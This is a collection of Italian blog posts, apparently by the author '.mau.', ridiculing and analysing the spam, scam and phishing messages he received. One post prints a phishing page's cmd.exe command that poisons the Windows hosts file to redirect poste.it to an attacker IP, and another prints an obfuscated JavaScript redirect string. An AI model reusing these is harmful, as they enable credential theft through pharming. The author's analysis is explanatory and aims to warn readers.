Notiziole di .mau.

Stavo aprendo twitter, quando al posto della usuale finestra mi è arrivata una pagina da un'improbabile URL http:// channel-survey-center.com / ?sov=123541 & id=20. La pagina mostrava solo un messaggio dall'ancor più improbabile testo

Lei è stato scelto a caso per partecipare al nostro 30 seconda indagine nazionale. Risposta ora per avere la possibilità di rivendicare un iPad 2 o iPhone 4S.

e l'unica possibilità possibile era cliccare su OK (oppure eliminare il tab :-) ) Il sorgente della pagina mostra un questionario:

Sei stato scelto nella regione di Rome per partecipare al nostro sondaggio annuale per visitatori. Richiederà solo 30 secondi del tuo tempo e migliorare l'esperienza dell'utente. Al termine avrai l'opportunità di vincere un Macbook Air^®, iPhone 4S^®, o un iPad 2^®.

Le tre domande erano:
- Sei maschio o femmina?
- DA DOVE DGT? (scherzo, era "Quanti video guardi in rete ogni settimana?")
- Che cosa pensi delle pubblicità nel video?

Non mi preoccupa più di tanto l'italiano sgangherato, quanto la stranezza di questa finestra che si è aperta così al posto di quella di twitter (ripeto: al posto di, non come popup o simili. E avevo digitato direttamente twitter.com sul browser, quindi non posso aver sbagliato a cliccare su un favorito). Non ho visto nulla di particolare in rete su questo sito: ne sapete qualcosa? (ah, se volete rispondere voi al survey fate pure)

Ma secondo voi che si può rispondere a una persona che mi scrive (via il mio profilo google) scrivendo «ho visto il suo profilo estremamente interessante ed ho pensato di metterla a conoscenza di una buona opportunità di lavoro su bologna e provincia. Azienda italiana operante nel settore cosmetica ricerca responsabili marketing.»? Il mio profilo è qua, se non lo sapete: se qualcuno mi spiega come si può stabilire che io sappia fare marketing, sappia di cosmetica, e sia interessato a posti di lavoro su Bologna e provincia gli/le sarei graterrimo.

Avevo appena approvato un commento sul blog. Era a un post di qualche giorno fa; aveva un contenuto sensato («dovrebbero offrire almeno un periodo gratuito e poi deciderei se pagare o meno»; per la cronaca, la risposta sarebbe stata "ci sono effettivamente trenta giorni di prova", e mi sono accorto dello spam solo perché stavo effettivamente rispondendo). Peccato che il nome del commentatore fosse "casino online" e l'URL era appunto quella di un casino online.
Questo è uno spam assolutamente mirato, nel senso che sono ragionevolmente certo che il postatore (che scrive da una ADSL fiorentina sotto Telecom) esista davvero e abbia scritto a manina il messaggio; ciò non toglie che dovrei stare più attento e leggere quello che approvo :-(

Cosa direste voi se vi trovaste tra i commenti del blog uno il cui testo recita così?

OMG , vedete quello che accade in Siria ? A dispetto di una brutale repressione del governo , le manifestazioni continuano

E che direste se scopriste che questo commento è stato fatto a un post di tredici mesi fa, che parlava di un errore che io avevo involontariamente introdotto in Wikipedia?

Immagino che pensereste subito a uno spam fatto anche relativamente bene dal punto di vista sintattico, anche se con ancora qualche piccolo problema semantico per essere associato a un messaggio pertinente, o almeno recente. La cosa più interessante è però che non ci sono link specifici: anche l'URL indicata dal mittente è un http://travel.yahoo.com/ che di per sé immagino esista, e non credo che il signor Yahoo! abbia bisogno di spammarmi così. L'unica idea che mi viene in mente è che il messaggio sia un'esca: dopo un giorno o due qualcuno fa una googlata con quel testo e vede chi l'ha approvato ed è spammabile. Altre idee?

Ah, se qualcuno si chiedesse il perché del titolo di questo post: l'IP da cui proviene il commento è assegnato a JSC "Silknet" Ana Nakashidze 95 Tsinamdzgvrishvili Str. 0112 Tbilisi GEORGIA.

Mi sono appena arrivati due commenti spammosi sul blog. Testo praticamente identico, visto che uno scrive «Grazie, questo post mi da la capacità di segnalare la cosa ad una mia confidente che ci teneva considerevolmente.» e l'altro «Grazie a, questo post mi da la possibilità di comunicare la cosa ad una mia amica che ci teneva considerevolmente.» (ah, "dà" si scrive con l'accento!). Generalità del sedicente mittente praticamente identiche: marco.antonelli@gmail.com e malosso.antonelli@libero.it (ma vivaddio, almeno scrivi lo stesso nome, e non rispettivamente Matteo Di Maggio e Mollo Raffaele! cosa ti costava?). Indirizzo IP di spedizione praticamente identico: 50.115.163.160 e 50.115.163.161 (dati del Whois: OrgName: DNSSLAVE.COM / OrgId: VIRPU-1 / Address: 324 E 11th Street Ste 1000, Kansas City).

I due link nelle generalità del messaggio (non nel testo, sarebbe troppo facile sgamarli) sono depositofelice.blog.kataweb.it e ziopaperone.blogs.it : entrambi con una pubblicità al Conto Arancio; o meglio il primo lo fa direttamente mentre il secondo ha un link a tags/conto-deposito e un utente www.blogs.it/user/diopaperone/ . I soliti misteri dello spam.

In questo weekend mi sono arrivati parecchi messaggi di spam sul blog, e alcuni hanno anche passato il controllo automatico antispam... quello che invece la scorsa settimana ha bloccato alcuni commentatori reali. No, non ho cambiato i filtri :-)

I testi sono molto interessanti, dal punto di vista di un cacciatore di spam, perché sono sensati tranne che per alcune parole scritte "scrambled", insomma anagrammate, e che mi sa servano per vedere se i messaggi vengano effettivamente approvati: ecco perché adesso che le cito gli metto in mezzo un asterisco o due. Un paio di esempi:

Io l’ho s*tup*ao solo oggi di questo blog, dalla newsletter di RM.*Mi serve qualche giorno per mettermi in pari.*Ma non c’e’ un link per i feed?

(RM è naturalmente Rudi Mathematici)

@leorotundo: spero s*mr*pe*e che i non-matematici si appalesino e mi dicano cosa non hanno capito, così imparo a semplificare!

(Leo Rotundo ha commentato sul mio blog, e sicuramente io faccio finta di essere un matematico)

Il meglio è sicuramente quello di tale Cristina, sulla mia recensione di Spaghetti Hacker: (l'avesse messo da qualche altra parte ci sarei cascato...)

Ciao Maurizio,il blog è molto bello e b*nven*euto. Mi dico c*e magari potresti nel futuro mettere in evidenza la dimensione “epica” che talvolta assume la ricerca matematica.*Per dire, altri argomenti interessanti potrebbero derivare dalla storia “non tecnica” di come alcuni risultati notevoli siano stati finalmente dimostrati. Per esempio un ritratto di Andrew Wiles e di come sia arrivato a dimostrare il teorema di Fermat. Perelman che dimostra la congettura di Poincaré e rifiuta la medaglia Fields, con Yao che dice che l’aveva dimostrata lui e rosica ancora. Un ritratto di Laurent Schwarz, inventore delle distribuzioni e attivista politico hors normes, è altra materia da post.(E a un certo punto potresti raccontare che Dieudonné(matematico francese) alla domanda ‘Perchè dobbiamo occuparci di matematica?’ rispondeva ‘Pour l’honneur de l’esprit humain’)Comunque, complimenti.

Tutti questi commenti, a parte avere nomi ed email fasulle, mettono come link profili facebook del tipo http://www.facebook.com/profile.php?id=nnnn. Alcuni numeri di questi profili, sempre scritti asteriscati per sicurezza, sono 10000*34053*91298, 10000*34053*97100, 10000*34054*00218 . Come vedete, sono probabilmente stati creati tutti assieme, visto che sono abbastanza vicini tra loro.

Qualcuno ne sa qualcosa in più? Visto questo, la cosa non è solo italiana, ma sicuramente è a un livello molto più alto di quanto successo in passato, con messaggi scritti da persone reali.

Premessa: per quanto mi riguarda lo spam è UBE + UCE, dove E sta per email, U per unsolicited (cioè spedita senza che io ti abbia chiesto nulla), C per commercial e B per bulk, cioè inviata a molta gente e non solo a me. Che sia commerciale o no, quindi, non è importante. Ho deciso che se qualcuno pensa sia lecito mandarmi messaggi di questo tipo allora non ha il diritto di lamentarsi se io ne parlo: deciderà il lettore chi dei due ha ragione.

Il messaggio di oggi arriva da tal "giuliocesare carminati " (ma me ne era arrivato uno un mese e mezzo fa da "francesco crisafulli messinasolidaleonlus@hotmail.it" che credo sia il vero nome dell'amichetto... anche se in siti come www.alfemminile.com trovate associato a quel sito una francescA crisafulli. Bisessuale?) e ha come titolo «INFORMAZIONE SOCIALE. Servizi fiscali gratuiti on-line. Ise,Red,730 e Unico 2012 H24». Ora, se voi vi fidate di uno che dice che fa INFORMAZIONE SOCIALE e che cambia nome come voi cambiereste maglietta, sapete dove andare per farvi fare i moduli delle tasse. Ma poi non venitevi a lamentare con me.

Un tipo standard di spam/phishing russo è quello della giovane donna al freddo e al ge-e-elo: anche la scorsa settimana sulla casella email di lavoro mi è arrivato un messaggio di tale Elena [elenacv@nextmail.ru] (in bcc, con un destinatario completamente diverso: ma tanto chi guarda le header?) che diceva di scrivere dalla locale biblioteca pubblica e aggiungeva «Abbiamo bisogno di calore in inverno perche' la temperatura e` molto fredda in camera da letto. A questo scopo, abbiamo bisogno di una stufa che funziona con il fuoco e la legna, ma perche' non possiamo comprare e troppo costoso per la nostra famiglia (pari circa 195 euro). Se avete un vecchio forno che e` portatile ed e` riscaldata dal legno e fuoco, e se si smette di usare, si prega di donare e inviarlo a noi.», terminando con «Ho tradotto questa lettera con il computer, mandami la tua risposta, perche' ho studiato inglese a scuola.» - è chiaro che la tecnologia russa per i traduttori automatici è molto superiore a quella occidentale, non credo che Google Translate sia mai arrivato a un tale livello.

Ma il messaggio - sempre in doppia copia, repetita juvant - sulla mia email personale è molto più interessante. Intitolato "Hello, I am Elena!" dice «Hi who are you? I found your email in my spam! Only blank message and your email. If you are real, answer to me please on my private email: elys@hotmail.ru Just curious who you are ;) Elena. » Magari qualcuno ci casca anche.

Ma la vera domanda è una: in Russia tutte le fanciulle si chiamano Elena?

Anna mi ha girato uno spam arrivato dalle Filippine, almeno come dominio ufficiale. Il bello è che - come la stele di Rosetta - c'è il testo inglese in fondo, già sgrammaticato di suo, e la versione italiana sopra, dove Google Translate deve aver fatto miracoli. Il messaggio inizia con

«Sono perdere Misericordia Kassala, interesse in voi,»

«Am miss Mercy Kassala, Interest in you,»,

«Consistono di amicizia è condivisione di idee e piallatura insieme,»

«Consist of friendship is sharing of ideas and planing together,»

Ieri sera stavo recuperando HijackThis da CNET (a questa pagina, non cliccateci a meno che non vogliate poi eliminare il download) quando mi sono trovato nella pagina la pubblicità di cui sopra.
Sono io che sto dormendo, oppure "Remove Spyware Protection" significa che elimino i programmi che mi proteggono dallo spyware?

Un paio di settimane fa (ammetto che non guardo molto spesso la spambox) mi è stato comunicato di aver vinto «the sum of € 900.000.00(Nine Hundred Thousand Euros Only).» A dire il vero al posto del simbolo dell'euro c'era un carattere non stampabile, ma non stiamo a sottilizzare.
La cosa divertente è che questo spam (in inglese) è partito dalla rete TIM (host 109.53.154.174, immagino che sia diventato parte di una spamnet) e che la lotteria si chiama... "Win For Life". Per la precisione, «The Italian Win For Life lotto. draws was conducted from an exclusive list of 13 lucky emails of individual and corporate bodies picked by an advanced automated random computer search. No tickets were sold». E naturalmente... il Claims Officer si chiama Guiseppe!

Continuo a pensare che il costo di manovrare gli spambot deve essere davvero basso, per permettersi di scrivere robaccia così malfatta e avere comunque un guadagno.

Ieri mattina mi è arrivato un messaggio di spam che ha saltato i filtri google. Per la cronaca, mi è arrivato sull'alias wikimedia, non so se la cosa conti. Ad ogni buon conto, il messaggio, intitolato «For the kind attention of Respected Director» (sapeste quanto mi rispettano...) e proveniente da "E-Learning OCL <pdm@ocl.ac>", iniziava così:

«Respected Director ,

Oxford College of London (OCL) is a private independent college offering Edexcel BTEC courses in various specialities. OCL has vast experience of providing Edexcel courses to international students from countries such as India, Nepal, Bangladesh, Nigeria, Ghana, Pakistan etcetera.»

Non credo ci sia da aggiungere molto.

(beh, no, qualcosa da aggiungere c'è. Avete notato come l'indirizzo di provenienza del messaggio sia un .ac, cioè l'Isola di Ascensione? Naturalmente la scelta non è casuale: gli indirizzi accademici inglesi sono .ac.uk, e si può sempre sperare che qualcuno ci caschi e non noti la mancanza del .uk finale. Comunque i corsi costano solo 500 sterline cadauno: rispetto ai nostri master credo valgano uguale - zero - ma siano molto più economici)

Su, lasciate stare per una volta l'italiano approssimativo e pensate a questo commento che mi è arrivato sul blog:

Ero una volta a Seattle. Devo dire quei ragazzi sono molto sviluppate le infrastrutture ferroviarie, anche se la città in sé è abbastanza raggiungibile a piedi. Inoltre la y hanno un sacco di ottimi alberghi e ostelli. I prezzi sono ragionevoli. Ho anche vinto soldi facili giocare casino online upthere a Seattle

(per la cronaca, il link era intorno alle parole "casino online"). A parte il doppio passaggio inglese-spagnolo-italiano il testo non era poi così male... anche se più che al post «gioco della domenica: Wooden Path 2» la nostra amica Samanta (senz'acca, sì) avrebbe dovuto scegliere «gioco della domenica: Paper Train». Niente da stupirsi che abbia passato i filtri antispam, insomma... Mi chiedo solo se ci siano software che riconoscano la lingua del post e localizzino il testo dello spam in quella lingua... e perché a questo punto non possano continuare nelle tecniche di intelligenza artificiale e ancorarsi a qualche parola chiave più riconoscibile. Vabbè, non si può pretendere tutto dalla vita.

In questi giorni stanno arrivando parecchie mail scritte in italiano, con un nome utente italiano, e testo del tipo

a presto

Francesco

Evitate accuratamente di aprire quei file, perché usano un vecchio trucco: un'immagine di un pixel per un pixel, che quindi è praticamente invisibile, ma che punta a un file ben specifico - nel mio caso, ho visto i due siti http://81.223.126.106 e http://91.118.50.200, e l'URL x.asp?x=113$30222107$1 - che permettono di sapere che il vostro indirizzo esiste davvero. Inutile aggiungere che se provate ad andare in quei siti trovate una simpatica paginetta dal titolo RIMOZIONE e testo

UNSUBSCRIBE AREA - Inserisci qui la tua mail per cancellare i tuoi dati e prevenire qualsiasi ulteriore invio

Ancor più inutile aggiungere di non mettere la vostra email, vero? Anche se non vi avessi detto che l'indirizzo da cui arrivano queste email è directdem.info?

No, non preoccupatevi, non è il vostro browser che è impazzito. Semplicemente la scorsa settimana mi sono trovato un messaggio di spam sulla casella aziendale, dove una gentil signorina ucraina trentenne (di più non mi ha detto) voleva parlare con me. Quello che ha colpito il mio occhio è stata questa frase:

«Sono sicuro che la nostra conversazione puo essere molto интерестинг»

Che manchi l'accento è normale, ma la parola in cirillico no. Traslitterare il russo non è molto difficile: i caratteri cirillici sono l'equivalente dei caratteri latini «interesting». Il dubbio che mi assale non è ovviamente "cosa può esserci di interessante nella nostra conversazione", ma "com'è che il traduttore automatico si è dimenticato di quella parola?" Misteri misteriosi.

Lo spam che mi è arrivato ieri sulla casella di posta aziendale aveva un testo che non sono riuscito affatto a comprendere:

Dare ai nostri consulenti amichevole una chiamata ora, sono più che disposto ad aiutare a fare la maggior parte del vostro gioco. I nostri giochi fornire intrattenimento eccezionale sia ai principianti così come i giocatori veterani - venire a dare una chance ora.

Mi chiedo se siano giochi erotici, giochi da casinò oppure qualcosa di completamente diverso, chessò roba di lavoro.
Ma quello che mi ha lasciato più perplesso è il titolo:

RE: Deliziati da un servizio clienti esemplare da uno staff di consulenti pronti a rispondere a tutte le vostre domande 24/7/265.

E gli altri cento giorni?

È abbastanza facile che persino il mio blog periferico ogni tanto abbia alcuni spam di gente che scrive in inglese e dice qualcosa tipo "nice blog", sperando che io sia così imbecille da approvare il loro post.

Ma un paio di settimanefa mi è arrivato un messaggio con questo testo:

Come Newbie, sono sempre alla esplorazione in linea sugli articoli che possano migliorarmi sull’argomento. Lascio anche l’ indirizzo di posta elettronica perché mi picerebbe avere avvisi sui prossimi aggiornamenti. Speciale blog.

Il "nome" del nostro commentatore è Preventivo Prestito, il sito non ve lo dico ma è un .net chiaramente italiano, l'IP di invio è 195.72.161.106 che corrisponde a non si sa cosa, perché è un record PTR a purple.community.co.uk che però non sembra esistere almeno come sito web ma ha solo un record MX. Sarà una traduzione anche il messaggio oppure no? misteri...

Bisogna dire che i phisher stanno diventando sempre più creativi, anche se hanno sempre dei grossi problemi con la lingua italiana (ma chi non ne ha?)
L'ultimo messaggio che mi è arrivato mi manda a un sito dove devo rispondere ad alcune domande per un sondaggio per conto della Coca-Cola; finito il sondaggio casco su una pagina (http://agrogarden.hu/include/coke_italia/coke_italia/refundportal.htm, ma non so quanto reggerà) dove appunto mi si prega di selezionare la mia banca. Chissà se qualcuno userà il codice utente pippo, password pippo, per entrare nel BCC...
Ah, oltre alla frase del titolo vi segnalo che "Ogni persona che prende il sondaggio vincerà 150 euro". Mica male, no?

Da questo punto di vista, bisogna dire che l'altro phisher (immagino russo, visto che le lettere accentate mi si visualizzano come caratteri cirillici) che mi scrive

Questo messaggio и stato inviato da eBay . Il tuo nome non и stato indicato in modo da garantire l'autenticitа del messaggio.

fa tanto ricordare i virus elboniani...

Ieri mi è arrivato un commento (su un vecchio post in cui parlavo di me stesso come faccio di solito) che iniziava così: «Un po´di giorni fa ho scritto al blog di quella serpe schifosa, che di certo e’ il figlio di puttana e, parrebbe, certamente, anche pedofilo *** [...] »; vi lascio immaginare il prosieguo.
Posso anche scrivere nome e cognome della sedicente mittente del messaggio (Antonella Rebuffini), perché tanto Google non ritorna nessun risultato a suo nome, e quindi immagino sia un nome fasullo; sicuramente l'indirizzo email che ha messo non esiste.

Ora io non so chi sia ***, e anche se lo sapessi e convenissi con il giudizio della sedicente signora o signorina Rebuffini non mi sognerei mai di scriverlo, nemmeno anonimamente; facendo una ricerca sul suo nome-e-cognome bisogna però dire che la maggior parte dei primi risultati che appaiono sono insulti nei suoi confronti, il che significa che forse a qualcosa tutto questo stalking serve (dal punto di vista di chi lo stalking lo fa, intendo). Però non mi pare comunque così bello andarsi a intrufolare in casa altrui per scrivere queste cose. A voi piacerebbe che qualcuno arrivasse a casa vostra e cominciasse a imbrattarla con scritte varie contro Berlusconi?

Stamattina la casella Gmail mi ha presentato un messaggio chiaramente spammoso ma che non era stato filtrato. Il mittente era ungherese, non era inviato in bcc ma a cinque destinatari espliciti, c'era qualche parola con i caratteri modificati (per la cronaca, "sensua| vibe in your re|ationships"); ma soprattutto c'era questo link.

http://www.google.fm/search?q=cache%3Acache%34%79%6F%75%2E%69%6E%66%6F

Lasciate perdere il .fm che è il google micronesiano: funzionerebbe anche con google.com. Tutti i % sono caratteri in esadecimale che dicono di vedere qual è la cache del sito cache4you.info: se uno clicca lì sopra riceve la cache di quel sito, che ha una simpatica funzione javascript che rimanda al sito spammoso vero e proprio. Per la cronaca la funzione converte la stringa qui sotto:

str="60!105!109!103!32!97!110!100!114!34!61!34!62!34!111!110!101!114!114!111!114!61!39!119!105!110!100!111!119!46!116!111!112!46!108!111!99!97!116!105!111!110!46!104!114!101!102!61!34!104!116!116!112!58!47!47!104!117!103!101!111!101!109!100!105!115!99!111!117!110!116!46!105!110!102!111!34!39!32!115!116!121!108!101!61!34!100!105!115!112!108!97!121!58!110!111!110!101!34!32!115!114!99!61!34!104!116!116!112!58!47!47!108!111!99!97!108!104!111!115!116!47!114!102!103!103!114!101!103!114!101!103!114!101!103!101!114!103!46!106!112!103!34!62!"

Devo dire che l'idea di farsi indicizzare il sito prima e mandare il link alla cache dopo è geniale: in questo modo si fa credere a google che non ci sia nulla di strano nella pagina :-)

Stamattina mi sono arrivati due messaggi di spam: uno su gmail (che non l'ha nemmeno messo nella posta in arrivo) e uno su Tiscali (che mostra sempre tutto, mi chiedo perché mai mi ostino a selezionare come spam i messaggi visto che tanto non ci fanno nulla). Entrambi puntavano allo stesso sito, ma con due nomi diversi: http://www.scatti-privati.com/ e http://www.fotoasorpresa.com/ (l'home page si direbbe "pulita", il resto non l'ho certo testato).
Il sito in questione si chiama The Final Joke; da una rapida scorsa ai termini di servizio, si direbbe che è nato per ottenere indirizzi di ignari internauti. In futuro non saprei che cosa succederà

Mario mi invia un messaggio di phishing proprio "simpatico" che gli è arrivato (e che gmail fortunatamente mette nello spam).

Il messaggio ha come titolo Autovelox e Tutor: dove sono?, il sedicente mittente è info@auto.it, la provenienza sembra essere dall'IP 192.168.74.6, e racconta di come la polstrada abbia messo un sito dove sono indicate le postazioni degli autovelox (vero). Cosa succede però se si apre il link, che - come forse avete immaginato - NON è al sito della Polizia Stradale?

Il codice HTML di quella pagina contiene tra l'altro queste righe:

<param name='first' value='cmd.exe /c echo 210.86.2.150 poste.it >>
%windir%\System32\drivers\etc\hosts & echo 210.86.2.150 www.poste.it
>> %windir%\System32\drivers\etc\hosts' >

Detto in termini meno criptici: se uno ha un PC con Windows, gira con i privilegi di amministratore, e ha un browser non troppo sveglio (Insomma Etilista) allora la pagina web fa in modo che la prossima volta che il malcapitato vuole andare nel sito www.poste.it sarà automaticamente rediretto al sito 210.86.2.150, che a sua volta (in questo momento, ma il bello della cosa è che possono cambiarlo quando vogliono!) punta a ftp://213.123.204.189/bpol/cartepre/index.html; che cosa faccia questo sito, ve lo lascio immaginare.

Come avrete intuito, la cosa pericolosa è che il phishing vero e proprio arriva in un secondo momento, e quindi l'ignaro utente non si accorge di nulla. Sapevàtelo!

Da uno spam arrivatomi stamattina:

sotto [NOME SITO] potete inserire il testo desiderato, calcolare i costi online ed inviarcelo.

I nostri traduttori sono esclusivamente di madrelingua. Così è garantita una traduzione perfetta.

Veloce - professionale - a prezzo conveniente = [NOME SITO]

Cordiali saluti
Il Vostro team di traduttori

Sì, il testo è in italiano formalmente corretto. Ma io non lo scriverei certo così, e non credo nemmeno un altro madrelingua lo farebbe. O no?

(ah, lo spam afferma di arrivare dalle Seychelles :-) )

tra lo spam odierno -- stavolta sulla casella @tin.it -- ce n'è uno di tale King Abdullah Bin Abdul Aziz (che dovrebbe essere il re dell'Arabia Saudita), il cui testo inizia con "On Tuesday, a catastrophic earthquake struck near Port-au-Prince, Haiti. The full extent of the damage is still being assessed, but the death toll -- already in the thousands -- is climbing fast." e continua con "Our neighbors in Haiti are racing to confront the enormous devastation -- and the OFA community can help.", terminando con "Paid for by Organizing for Saudi Arabia, a project of the Islamic National Committee -- 430 South Capitol Street SE, Washington, D.C. 20003. This communication is not authorized by any candidate or candidate's committee." che non ho ben capito che tipo di disclaimer sia.
Uno potrebbe anche pensare che questo sia un messaggio legittimo, considerando tra l'altro che non c'è un indirizzo di sito ma solo un recapito telefonico britannico. Ho almeno due motivi per non crederlo: il primo è che appunto c'è un comitato con sede a Washington che fa contattare un numero britannico (e il messaggio è stato spedito da un sito americano. le header dicono vps.carrollstrategies.net); il secondo è la frase "Any Funds given to the good people of Saudi Arabia Here in The UK will be shared amongs Red Cross and all relief agencies." Croce Rossa, sì, non Mezzaluna Rossa. Un errore da principianti.
(PS: vedi anche qua, col tipo che è andato direttamente a controllare sul sito reale della fondazione. Non posso che concordare col primo commento in quel thread: a certa gente bisognerebbe semplicemente sparargli)

Commento sulla notiziola precedente, la recensione di Complexity. Testo: «Ciao! Ho provato a contattare il blogmaster, ma non ci sono riuscita. Forse così ce la faccio?». Nome: Valeria Martini. Indirizzo email e URL: un sito di scommesse online.
A voi probabilmente non ve ne sarebbe potuto fregare di meno di un commento con un link spammoso nemmeno visibile direttamente. A me dà molto fastidio. E visto che questa è casa mia (e lo sarebbe anche se non pagassi l'hosting) ho eliminato il messaggio (rispondendo alla mittente).

Nello spam di oggi, un messaggio aveva come titolo "GEWINN" e un altro "FÉLICITATIONS ! ! ! VOTRE E-MAIL A ETE TIRER AU SORT" (sì, i titoli erano TUTTI IN MAIUSCOLO). Il secondo messaggio era interessante, perché spiega come mai la Bill Gates Foundation deve spedire le segnalazioni dei tanti soldi vinti dalla Costa d'Avorio: ritirare i soldi a New York diventa sempre più difficile, e quindi hanno iniziato a delegare agenzie in varie parti del mondo... e questa volta era toccato all'Africa. Non garantisco sulla qualità grammaticale del testo, io il francese scritto lo capisco ma non lo conosco. Posso invece assicurarvi che il testo in tedesco del primo messaggio, sedicente mittente Zurich-Sicherheitsfirma S.A . Herr D.M. (sì, solo con le iniziali), indirizzo email indicato @aol.com (!), indirizzo email mittente @terra.es, è più sgrammaticato dello spam in italiano che riceviamo tutti i giorni. Per i germanofoni lascio una chicca: «Your E-Mail gewonnen haben die Summe von EUR.787.000.00»

Detto tutto questo, continuo a chiedermi una cosa. Questi messaggi sono arrivati non all'indirizzo @gmail.com ma a un indirizzo @tiscali.it, dove è difficile immaginare che ci sia molta gente che parli francese o tedesco. Soprattutto il messaggio francese sembra una variante della truffa nigeriana, e quindi mandata a una persona per volta. Fare un po' di controlli prima no?

Bisogna dire che i tipi che hanno preparato l'ultimo phishing per PosteItaliane sono indubbiamente italiani e probabilmente con qualche conoscenza di legalese, tanto che persino il filtro antispam di Gmail è stato fregato. Una frase come «Le operazioni da Lei effettuate fino ad oggi sono state classificate come "operazioni ad alto rischio" per la suddetta motivazione» è perfettamente in linea con quanto potremmo trovarci scritto in un messaggio della nostra banca; anche la successiva «Nell'impossibilità di Posteitaliane di verificare la veridicità dei Suoi dati la preghiamo di procedere come di seguito descritto.» non è affatto male.
Per fortuna i nostri non hanno conoscenze informatiche decenti. Basti vedere che hanno mandato la mail da 151.23.72.49 all'indirizzo disnet@disnet.it, e che il sito di "autenticazione" era http://digilander.libero.it/posteitalia/ (già rimosso, quelli di Libero sono stati veloci :-) ) Non si può in effetti pretendere tutto dalla vita, no?

Tra lo spam di questi giorni, un colombiano che vorrebbe convincermi che per l'undicesimo anniversario di Google avrei vinto "Ł450,000.00GBP" (sì, con la elle barrata polacca che non si capisce bene a cosa serva, visto che tanto c'era il GBP dopo). Certo che non dovrei dire queste cose, visto che la mail finisce spiegando che c'è stata troppa gente che ha detto della vincita agli amici e questi si sono presentati a nome degli effettivi vincitori; vorrà dire che per questa volta "Google Incoporation" non mi darà nulla.

Ma il meglio è di gran lunga il post dal titolo "RE: Usa il tuo carota meglio", che come "Modo per sostenere la vostra salute" ci consiglia così: «Doccia sua camera da letto con momenti che non si dimentica!». Il mittente del messaggio, tale "Erezione confezioni", secondo me merita davvero una pubblicità maggiore che il cestino dello spam.
Visto poi che stavolta mi chiedono esplicitamente di "condividere questa lettera con i tuoi amici, il più presto possibile", la condivido e vi chiedo un paio di cose. Da quando in qua l'organo sessuale maschile si chiama "carota" / "carrot"? E soprattutto, il "Doccia" sta per una "golden shower" o per uno "show her" che ha perso lo spazio e un'acca prima di essere tradotto in italiano? Questi sì che sono problemi!

Invece trovo pessimo il messaggio - in inglese, proveniente da una webmail cilena - che mi dice «your email has brought you an unexpected luck as you are a lucky winner of CASA DELLA CARITA cash Awards of 250,000 pound sterling , for claims you can visit our website (www.casadellacarita.org )» e "firmato" Angelo Abriani. Finché sono "Google", "Coca-Cola", "Marlboro" a regalarmi i soldi è un conto; ma usare un ente no profit mi sembra davvero una schifezza doppia.

I messaggi di spam sono spesso molto ripetitivi, e dopo un po' uno si scoccia di leggerli. Sì, ci può essere quello di CastaSì (Laetitia che finalmente si concede al destinatario?), ma nulla di più.
La scorsa settimana però ho trovato in una delle mie svariate caselle email (sotto tin.it) un messaggio dal titolo «Reactivarea contului Dumneavoastra.» che evidentemente era scritto in rumeno (che nella mia accezione è una lingua che sembra comprensibile ma non lo è ;-) )
Ma secondo voi, perché gli spammatori rumeni hanno spedito anche a indirizzi .it? immaginano che la comunità rumena in Italia sia così ampia da avere la possibilità che qualcuno ci caschi? Oppure loro - o chi offre il servizio di spammatura per conto terzi - fanno un lavoro così pessimo da non mettersi nemmeno a inserire un banale filtro?

Era un bel po' che non mi arrivavano più spam babelfishati, ma devo dire che quello di ieri è davvero poetico.
Il titolo è "Scopri le Nuove Possibilita Con il tuo Link" che oggettivamente è piuttosto difficile da decifrare, e potrebbe significare di tutto. Ma anche se non fate caso al mittente ("Tale durata non ha tutti"), sono certo che il testo vi farà capire che si sta parlando delle pastigline blu che fanno tanto bene a una parte del corpo dei maschietti.

Hai una decisione giusta. Il nostro prodotto Se voi e il vostro Determina femminile non delude!

Vedrai un grande gallo rende la vita molto piu piacevole! Il nostro prodotto e per il tuo nuovo mondo di apertura.

Ci sono punti relativamente semplici da controtradurre: "un grande gallo" è evidentemente "a big cock". Immagino poi che "il tuo nuovo mondo di apertura" non si riferisca alle aperture femminili, ma sia qualcosa tipo "will open you a new world". L'unica frase su cui mi sono impigliato è "Se voi e il vostro Determina femminile", compresa la maiuscola. Qualche idea?

Venti minuti dopo che ho scritto la notiziola precedente, mi è arrivato questo commento:

Hey, have you seen this news article?
New details about Michael Jackson's Death Emerge
I was wondering if you were going to blog about this...

Nulla di strano, se non al limite la rapidità con cui uno spammatore riesce a vedere che ho postato una notiziola (secondo me la colpa è di una cosa che sto provando). Solo che non ci sono indirizzi web inseriti con la firma, e c'è solo un link all'interno del testo che porta a un sito (http://dailymonitornews.com/) che in questo momento sembra solamente un blog monomaniaco sulla morte di Michael Jackson.[*] Mi chiedo quale sia la strategia...

[*] no, di Jacko non ne parlo. Non mi è mai interessata la sua musica, salvo al limite qualcosa dei Jackson Five.

Mi è arrivato uno dei tanti messaggi di spam con titolo (maiuscolo) +LA SUA PREZIOSA SANGUE+HIS PRECIOUS BLOOD+. I segni più mi avrebbero dovuto far capire che il testo del messaggio non mi invitava ad andare a donare il mio sangue, ma che c'era Qualcuno che l'aveva già donato a me. "Ma i 5 o 6 litri della preziosa sangue que Dio il Figlio fatto uomo versò sulla croce, morendo en nostro luogo, furono sufficienti per purificare potenzialmente i peccati di tutta l´umanità." Mi stupisce l'uso del "potenzialmente", che rivela una cultura teologica niente male [*]; non mi stupisce per nulla l'italiano molto approssimato, dato che l'indirizzo dello spammatore è salvacion.por.amor (at) gmail.com, e si definisce "HOLA. MI NOMBRE ES ISAÍAS, SOY MISIONERO, VIVO EN MEXICO Y ME DEDICO A LLEVAR MENSAJES DE SALVACIÓN POR TODO EL MUNDO." (di nuovo in maiuscolo, sì)
Però, dopo tutta uan serie di frasi che assomigliano all'italiano ma ne sono sempre diverse, il messaggio termina con un link alla "BIBBIA ITALIANA". Vi fidereste?

[*] quello che dice il sacerdote nella Consacrazione, in italiano "Questo è il mio sangue, versato per voi e per tutti in remissione dei peccati", nel testo latino fa "Hic est enim sanguis meus qui pro multis effunditur in remissionem peccatorum". Ma magari in spagnolo la traduzione è più vicina al testo latino.

È un po' che non mi arrivavano proposte di matrimonio via mail. Si vede che non sono più il tipo. Però questo messaggio che mi è arrivato - e che copio paro paro giusto senza l'indirizzo della signorina in questione - è troppo buffo. Se qualcuno volesse corrispondere con la tipa, che magari è una di queste (si spera che non sia questo il caso...), mi scriva in privato :-)

=-=-=-=-=-=-=-=-=
Caro
Il mio nome e Natalia! Io penso che Lei dovrebbe sapere che io dall'Ucraina ed io vivo in
citta sotto nome Kiev!
Abbastanza il grande e la bella citta!
In generale io nascevo in lui ed io vivo su todays!
Ora a me di 26 anni e come Lei probabilmente ha indovinato io ora coltivo e solitario! Quindi ha risultato
che io non potessi incontrare correttamente la persona con cui potrebbe gettare nel destino!

